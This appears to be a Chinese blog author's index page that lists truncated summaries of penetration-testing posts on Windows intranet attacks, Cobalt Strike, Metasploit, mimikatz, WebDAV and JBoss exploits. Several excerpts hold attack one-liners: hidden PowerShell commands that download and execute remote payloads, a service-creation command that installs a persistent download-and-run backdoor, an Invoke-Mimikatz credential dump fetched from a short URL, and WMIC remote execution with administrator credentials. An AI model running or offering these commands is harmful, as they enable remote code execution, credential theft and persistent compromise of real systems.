自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(18)
  • 收藏
  • 关注

原创 远程连接windows

3389在windows-运行,输入mstsc,回车即可 需要对方开启3389端口,并且你有对方机器的用户名和密码wmic远程连接wmic /node:"192.168.2.23" /password:"abc123" /user:"administrator"如果能够远程连接成功,就可以执行一些wmic命令wmic /node:"192.168.2.23" /p...

2018-04-17 14:05:22 1908

原创 msf传递shell给cobalt strike

前提:拿到msf的session会话 方法1:在cmd中执行cobalt strike的scripted web delivery命令,比如powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.10.20:80/a'))"方法2:通过msf的expl...

2018-04-11 17:02:10 2218 1

原创 mimikatz使用

mimikatz使用时需要高权限,至少是administrator权限 mimikatz抓取密码的命令需要system权限,可以先进行提权privilege::debug //提升权限(从administrator提升到system)抓取hashsekurlsa::logonpasswords //获取当前在线用户的明文密码(需要高权限运行)lsadump::lsa ...

2018-04-11 16:46:48 6860

原创 端口转发与端口映射

端口映射端口映射是NAT的一种,功能是把在公网的地址转翻译成私有地址, 采用路由方式的ADSL宽带路由器拥有一个动态或固定的公网IP,ADSL直接接在HUB或交换机上,所有的电脑共享上网。端口映射就是将外网主机的IP地址的一个端口映射到内网中一台机器,提供相应的服务。当用户访问该IP的这个端口时,服务器自动将请求映射到对应局域网内部的机器上。端口映射有动态和静态之分。通俗来讲,端口映射...

2018-04-09 21:45:25 11021

原创 cobalt strike开机自启动后门

前提:拿到cobalt strike的session设置开机自启动服务使用sc命令创建服务sc create "Windows Power" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.1...

2018-04-09 10:54:52 4883 2

原创 内网渗透之收集信息

收集本机ip信息ipconfig /all查看进程,注意杀软tasklist /v查看安装软件的版本(两种方式)wmic product > version.txt利用wmic命令,可以将结果输出到文本中powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name,...

2018-04-08 23:08:56 1721

原创 内网渗透技巧

通过powershell 运行mimikatzpowershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" 获取hash之后,解出明文密码 将目标机器共享盘映射到本地的h盘net use h: \\ip\c$ "密码"...

2018-04-04 15:53:19 525

原创 windows命令行下载文件

vbs下载通过写一个vbs脚本来下载文件 在windows机器中,命令行执行以下各条命令echo Set Post = CreateObject("Msxml2.XMLHTTP") >>zl.vbsecho Set Shell = CreateObject("Wscript.Shell") >>zl.vbsecho Post.Open "GET","htt...

2018-04-03 14:29:48 3473

原创 利用cobalt strike获取域控权限

cobalt strikecobalt strike是一个后渗透工具,和msf有很多相似的地方,也可以看做是一个远控工具。前期准备获取一个cobalt strike的会话。可以利用cs本身的payload,或者是通过别的shell反弹到cs。域内收集信息通过一些cmd命令,可以收集到域内的信息 在cs的会话中,执行命令 查看有多少域和工作组shell net...

2018-04-02 22:20:48 2292

原创 利用metasploit生成免杀后门

免杀之前的博客中,有利用msf生成代码,目标机执行然后获得shell。但是现在有很多杀软,对各种木马有检测机制,执行危险代码或者运行危险程序,杀软会进行阻止。免杀有很多种方式,今天介绍一种利用msf生成shellcode免杀,编译为exe文件,这种免杀能够绕过大部分杀软静态免杀静态免杀是能够绕过杀软检测,运行时也不会报毒。但是执行危险命令就会报毒,比如说新建用户、进程注入等。使

2018-01-26 18:21:04 5603

原创 IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)

漏洞简介漏洞编号:CVE-2017-7269发现人员:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院)漏洞简述:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行,目前针对 Windows Server 2003 R2 可以稳定利用,该漏洞最早在2016年7,8月份开始在野外被利用。漏洞类型:缓冲区溢出漏洞等

2018-01-24 12:57:55 4243

原创 jboss漏洞利用

JBOSSJBoss应用服务器(JBoss AS)是一个被广泛使用的开源Java应用服务器。它是JBoss企业中间件(JEMS)的一部分,并且经常在大型企业中使用。因为这个软件是高度模块化和松耦合的,导致了它很很复杂,同时也使它易成为攻击者的目标。使用工具msf,jexboss,zoomeye,fofa下载jexboss在github中搜索jexboss下载漏洞利用代码

2018-01-24 11:05:15 8226

原创 提权

提权

2017-12-20 16:10:48 1785

原创 代码审计

代码审计

2017-12-20 16:10:21 488

原创 Struts2远程命令执行漏洞

Struts2 远程命令执行漏洞

2017-12-20 16:09:51 14717 1

原创 ImageMagick 命令执行漏洞

ImageMagick 命令执行漏洞

2017-12-20 16:09:12 2213

原创 ARP攻击

ARP攻击,DNS欺骗

2017-12-20 16:08:22 425

原创 OpenSSL心脏滴血漏洞

OpenSSL心脏滴血漏洞

2017-12-08 09:47:37 4613

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除